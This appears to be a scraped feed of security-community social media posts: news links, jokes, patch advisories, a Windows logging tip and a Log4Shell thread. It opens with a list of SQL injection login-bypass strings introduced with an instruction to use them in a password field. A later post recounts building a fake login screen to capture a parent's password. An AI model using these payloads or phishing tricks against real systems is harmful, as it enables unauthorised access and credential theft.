SQL injection strings. Use them in the password field. ' or 1=1-- " or 1=1-- or 1=1-- ' or 'a'='a " or "a"="a ') or ('a'='a ") or ("a"="a

or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1#

Bitfi finally gives up claim cryptocurrency wallet is unhackable zd.net/2N6XOY2 by Charlie Osborne

What is a #redteam success? :D forbes.com/sites/thomasbr…

Web App Hacking Notes. Notes I've taken while working through various web app pentesting labs, tutorials, books, and videos. github.com/tcpiplab/Web-A…

me irl, trying to keep up with work, e-mails, discord and twitter

Patch your Domain Controllers running DNS (typical config, so most orgs) ASAP. DNS remote code execution vulnerability which runs as LocalSystem on Windows DNS server (usually a DC). portal.msrc.microsoft.com/en-US/security…

Ever wonder where Windows log descriptions come from? I was going deep on the logging section of my upcoming SANS Institute #SEC450 Blue Team Fundamentals class and ended up with this cool PowerShell command. It dumps all the XML fields and message templates for any event ID!

When your kid asks for a switch for Christmas

My mom controlled our AOL account when I was about 13 and would come into my room to sign me in. So, I created an entirely fake AOL login flow in Visual Basic and had her sign me in once to capture the password. Old school phishing.

New on the blog: Looking Ahead to PCI DSS v4.0 bit.ly/2UlBcU4

Here's a fun game: Guess the password needed to unlock his PC...

Ray [REDACTED] don't need the postcode mate, have everything you need Fristname Lastname Card Number Bank Name Issue Date Expiry Date CCV free Pizza's every night till Feb 2023 from what I can see thanks to horizontal "flip" oh, wait, it's safe because he photoshopped out the swipe strip!!

There is a new DEF CON contest in here someplace...

SOC analyst responding to a volumetric DDoS by calling their ISP helpdesk...

October is National Cybersecurity Awareness Month. Read the press release: go.usa.gov/xV7hy

For week 2 of #CyberSecurityMonth the Council shares tips to defend against #phishing attacks. #BeCyberSmart National Cybersecurity Alliance Read more: bit.ly/3mNkn3X

10 #Log4Shell Facts vs Fiction: a 🧵 1. 1.x is NOT vuln to this RCE. While it doesn't have another RCE, it requires access to send serialized data to a listener ON the log server. This is much MUCH harder to exploit and kind of rare for a Log4j server to be running.